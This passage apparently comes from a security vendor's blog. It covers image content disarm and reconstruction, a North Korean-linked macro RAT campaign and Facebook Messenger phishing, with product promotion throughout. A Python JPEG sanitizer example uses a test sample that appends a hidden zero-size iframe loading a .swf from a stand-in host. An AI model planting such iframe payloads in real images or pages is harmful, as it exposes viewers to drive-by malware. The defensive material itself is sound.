    BUFFERZONE’s SafeBridge™, whose strategic concept is Protection by containment™, automatically neutralizes the threats present in images. Consequently,
    the image post-CDR no longer contains the malicious iframe.
    As established in prior research [3], the sanitized image remains visually indistinguishable from the original image.
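    To make the marker walk above and the CDR step concrete, here is an added example in Python. It is not the post's own code, not BUFFERZONE's SafeBridge™ and not jpegdump: it walks the segment list the way the dump above does (skipping 0xFF00 byte stuffing and RSTn markers inside the scan data), returns whatever sits after EOI, and rebuilds the file from structural segments only. All function names, the sample bytes and the example.invalid URL are constructed for this example; the sample is a structurally valid marker sequence with dummy tables, not a decodable picture.

```python
"""Walk a JPEG's marker structure, report anything appended after EOI, and
rebuild a copy that keeps only the segments a decoder needs. Added example
for this post (constructed names and sample bytes), not BUFFERZONE code."""
import struct
from collections import namedtuple

Segment = namedtuple("Segment", "offset marker length payload")
SOI, EOI, SOS = 0xFFD8, 0xFFD9, 0xFFDA
STANDALONE = {SOI, EOI, 0xFF01}                    # markers without a length field
DROP = {0xFFE0 + i for i in range(16)} | {0xFFFE}  # metadata only: APP0..APP15, COM
NAMES = {SOI: "SOI", EOI: "EOI", SOS: "SOS", 0xFFC4: "DHT", 0xFFDB: "DQT",
         0xFFDD: "DRI", 0xFFFE: "COM", **{0xFFE0 + i: f"APP{i}" for i in range(16)},
         **{0xFFC0 + i: f"SOF{i}" for i in (0, 1, 2, 3, 5, 6, 7, 9, 10, 11, 13, 14, 15)}}

def _next_marker(data, pos):
    """Offset of the next real marker at or after pos, skipping the 0xFF00 byte
    stuffing, RSTn markers and 0xFF fill bytes that occur inside scan data."""
    while True:
        i = data.find(b"\xff", pos)
        if i < 0 or i + 1 >= len(data):
            raise ValueError("unterminated entropy-coded segment")
        nxt = data[i + 1]
        if nxt == 0x00 or 0xD0 <= nxt <= 0xD7:
            pos = i + 2
        elif nxt == 0xFF:
            pos = i + 1
        else:
            return i

def walk_segments(data):
    """Return (segments, trailing): the segment list up to EOI and every byte
    after it. Scan data is recorded as a Segment whose marker is None."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI")
    segments, pos = [], 0
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos:#x}")
        (marker,) = struct.unpack(">H", data[pos:pos + 2])
        if marker in STANDALONE:
            segments.append(Segment(pos, marker, 0, b""))
            pos += 2
            if marker == EOI:
                return segments, data[pos:]
            continue
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        segments.append(Segment(pos, marker, length, data[pos + 4:pos + 2 + length]))
        pos += 2 + length
        if marker == SOS:                # entropy-coded data follows the SOS header
            end = _next_marker(data, pos)
            segments.append(Segment(pos, None, end - pos, data[pos:end]))
            pos = end
    raise ValueError("no EOI marker found")

def marker_names(data):
    """Marker sequence as names, e.g. ['SOI', 'APP0', ..., 'SOS', 'entropy', 'EOI']."""
    return ["entropy" if s.marker is None else NAMES.get(s.marker, f"{s.marker:04x}")
            for s in walk_segments(data)[0]]

def trailing_data(data):
    """Bytes hidden after EOI; a clean file returns b''."""
    return walk_segments(data)[1]

def sanitize(data):
    """CDR-style rebuild: APPn/COM metadata and everything after EOI are dropped;
    structural segments and the scan data are copied verbatim."""
    out = bytearray()
    for s in walk_segments(data)[0]:
        if s.marker is None:
            out += s.payload
        elif s.marker in DROP:
            continue
        elif s.marker in STANDALONE:
            out += struct.pack(">H", s.marker)
        else:
            out += struct.pack(">HH", s.marker, s.length) + s.payload
    return bytes(out)

def _seg(marker, payload):
    return struct.pack(">HH", marker, len(payload) + 2) + payload

# Constructed sample: a valid marker sequence with dummy tables (not a decodable
# picture), followed by an iframe appended after EOI like the one in the post.
SAMPLE_JPEG = (
    b"\xff\xd8"                                                      # SOI
    + _seg(0xFFE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")  # APP0
    + _seg(0xFFFE, b"constructed sample comment")                    # COM
    + _seg(0xFFDB, b"\x00" + b"\x10" * 64)                           # DQT
    + _seg(0xFFC0, b"\x08\x00\x08\x00\x08\x01\x01\x11\x00")          # SOF0, 8x8 greyscale
    + _seg(0xFFC4, b"\x00\x01" + b"\x00" * 16)                       # DHT
    + _seg(0xFFDA, b"\x01\x01\x00\x00\x3f\x00")                      # SOS header
    + b"\x12\x34\xff\x00\x56\xff\xd0\x78\x9a"                        # scan data: FF00 stuffing, RST0
    + b"\xff\xd9"                                                    # EOI
)
SAMPLE_TRAILER = b"<iframe src=http://example.invalid/h.swf width=0 height=0></iframe>\r\n"
```

    Running marker_names(SAMPLE_JPEG + SAMPLE_TRAILER) gives the same SOI ... SOS, entropy, EOI sequence as the dump above, trailing_data() returns the appended iframe, and sanitize() yields a file whose trailing_data() is empty and that contains neither the iframe nor the COM text. Two caveats a practitioner should keep in mind: this walker only reports what is appended after EOI, whereas content tucked inside an APPn or COM payload is handled by dropping those segments rather than inspecting them; and a segment filter is a simplification, since dropping an APP14 Adobe marker can change how some decoders interpret colour, which is why a production CDR re-encodes the pixel data rather than copying segments through.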

    If you want to view documents or images before CDR, use BUFFERZONE® Safe Workspace™, whose strategic concept is Protection by containment™. Safe Workspace™
    is a suite of prevention capabilities based on application isolation technology that includes Safe Browsing, SafeBridge® (Content Disarm and Reconstruction capabilities), and Safe Removable (USB attack prevention), all combined with clipboard security.

    The Safe Workspace™ virtual container is created by a kernel driver, which virtually separates the operating system into two logical zones. The first is the trusted zone, which is connected to all of the organization’s networks and to the operating system’s files. The second is the untrusted zone, which acts as a buffer zone where applications run securely isolated from the trusted zone’s memory, files, registry, and processes. This method offers a low CPU and memory footprint, a high quality of experience, and the ability to work seamlessly
    inside the virtual container without noticing that you are protected from browsing and USB threats.

    BUFFERZONE® is the only virtual containment solution based on six patented technologies. With this isolation in place, the organization’s content stays secure: downloaded attachments are isolated, while antivirus and EDR (Endpoint Detection and Response) solutions can still scan the untrusted virtual zone at any time. The virtual environment can be cleaned in one click, eliminating any malicious traces, and ransomware cannot run and attack the endpoint.

    Try it now!

    References

    [1] Bill Toulas, Hackers hide malware in James Webb telescope images, https://www.bleepingcomputer.com/news/security/hackers-hide-malware-in-james-webb-telescope-images/

    [2] Bill Toulas, Hacking group hides backdoor malware inside Windows logo image, https://www.bleepingcomputer.com/news/security/hacking-group-hides-backdoor-malware-inside-windows-logo-image/

    [3] Eli Belkind, Ran Dubin and Amit Dvir, Open Image Content Disarm And Reconstruction, 2023, https://arxiv.org/abs/2307.14057

    New Attack with the Same Story – The Need for Zero-Trust File Security

    January 11, 2024

    Target: IT Professionals

    Tags: Malware, Ransomware, Zero-Trust, Safe Workspace™, Safe Browsing

    A recent phishing scheme has been detected that uses a Russian-language Microsoft Word document as a vehicle to distribute malware. This malware, which targets Windows systems,
    is designed to steal sensitive data, as reported by The Hacker News.

    The operation is linked to a group known as Konni, which has connections with a North Korean faction identified as Kimsuky (also known as APT43).

    The campaign employs a remote access trojan (RAT) that can both gather data and control infected devices. This cyber espionage group, known for its focus on Russia, typically
    initiates its attacks via spear-phishing emails and malicious documents. The document’s Visual Basic for Applications (VBA) macro, once enabled, triggers an intermediate Batch script.
    This script conducts system checks and bypasses User Account Control (UAC), setting the stage for the introduction of a DLL file equipped for both data collection and exfiltration.
    The malicious payload features a UAC bypass mechanism and secure communication with a command-and-control (C2) server, which allows the attackers to carry out high-level commands remotely.

    Macro Based Attacks – What can we do?

    The combination of lure (phishing) content and a macro is one of the most common attack vectors that keeps hitting organizations. The method is so successful that it still works
    even though everyone knows about it. The problem starts with our existing security controls, which are based on detection.
    Malware detection has advanced significantly with the introduction of Artificial Intelligence (AI); however, it is not 100% effective, and the organization remains at risk.

    At BUFFERZONE®, we advocate for IT solutions that are both straightforward and impactful. That is why we have introduced an alternative approach centered on zero-trust malware
    prevention. Unlike traditional security models that depend on detection and inherently involve a degree of trust, our method introduces two key innovations.
    The first is our patented isolation technology, which creates a secure barrier between potential threats and the system. The second is our pioneering zero-trust file security feature,
    known as Content Disarm and Reconstruction. This approach ensures a robust and preemptive stance against cybersecurity threats, aligning with our commitment to simplicity
    and effectiveness in IT security.

    BUFFERZONE® Safe Workspace™ for endpoints provides robust protection against all forms of downloaded and attached malware. By creating a controlled environment,
    Safe Workspace™ effectively contains and neutralizes potential threats before they can cause any damage. This advanced security solution alleviates organizations’ constant
    worry about threats such as USB-borne attacks, file-less malware, ransomware, and widespread phishing attempts.

    BUFFERZONE® creates two distinct zones: a virtual trusted zone and an untrusted zone. Within the untrusted zone, users can freely browse the internet, open Microsoft Outlook
    links and attachments, and access removable media such as USBs. Meanwhile, the trusted zone remains securely isolated and is a gateway to the organization’s secure content.


    Keep your IT simple and effective

    Contact us for more details.


    Massive Phishing Onslaught Targets Facebook Messenger Business Users – Stop Relying on Detection, Start Isolating

    October 12, 2023

    Target: IT Professionals

    Tags: Malware, Phishing, Zero-Trust, Isolation

    Cybercriminals have tapped into a vast network of fabricated and breached Facebook profiles, unleashing millions of deceptive Messenger messages aimed at Facebook business accounts, embedding password-theft malware [1].

    The malefactors craftily deceive the recipients into downloading an archive (either in RAR or ZIP format), which includes a downloader for a cunning Python-based program designed to
    extract stored cookies and passwords from the user’s browser.

    The initial approach these criminals take is to send deceptive Messenger messages to business accounts on Facebook. These messages masquerade as copyright infringement notifications
    or product information inquiries. An attached archive, when executed, retrieves a malware installer from GitHub repositories, cleverly bypassing detection mechanisms and leaving minimal footprints.

    This attached archive not only delivers the payload (termed project.py) but also procures a standalone Python environment essential for the malware’s information theft activities.
    For sustained malicious activity, it ensures the malware launches during system startup.

    With a sophisticated design, the project.py file is layered with five stages of obfuscation, making it especially tricky for anti-virus systems to identify and neutralize the threat.

    Guardio Labs has shed light on the staggering magnitude of this campaign, noting its vast reach. Their analysis reveals that 7% of all business accounts on Facebook have been in the
    crosshairs, with about 0.4% succumbing to the temptation and downloading the malevolent archive.

    However, it is important to note that for the malware to spring into action, users must execute the batch file. The exact count of compromised accounts remains a mystery, but given
    the scale, it is conceivable the numbers are substantial.

    What can we do?

    The answer is rooted not in detecting the new attack variation but in its prevention. This is why we created BUFFERZONE® Safe Workspace™.

    BUFFERZONE Safe Workspace™ is a comprehensive defense suite anchored in application isolation technology. This arsenal features the Safe Browser, SafeBridge® (with Content Disarm and Reconstruction functions), Safe Mail, and Safe Removable (geared towards thwarting USB-based attacks), all fortified with clipboard security. At its core, Safe Workspace™ deploys a virtual container constructed by a kernel driver. This container splits the operating system into two logical zones:

    Trusted Zone: A non-isolated region connected to the organization’s resources.

    Untrusted Zone: Serving as a protective buffer, this zone enables various applications to operate in isolation, cordoned off from the memory, files, registry, and processes of the trusted zone.

    Safe Workspace™ is a reliable solution that allows users to access USB (Universal Serial Bus) files, email attachments, and downloaded content. It provides a protective virtual container that isolates potential threats from the broader environment, ensuring that malware cannot reach or compromise sensitive organizational data. The virtual container is periodically deleted and rebuilt; detection engines can scrutinize it for added security. By containing potential threats in isolation, BUFFERZONE prevents malicious entities from proliferating within an organization.

    By isolating the browser, all downloaded files are contained, the extracted files are not authorized to run, and the evasive attack fails. BUFFERZONE® lets third-party detection engines scan the isolated virtual container. If part of the attack is detected, the file can be quarantined and the environment can be cleaned in a few seconds.


    References

    [1] Bill Toulas, Facebook Messenger phishing wave targets 100K business accounts per week, https://www.bleepingcomputer.com/news/security/facebook-messenger-phishing-wave-targets-100k-business-accounts-per-week/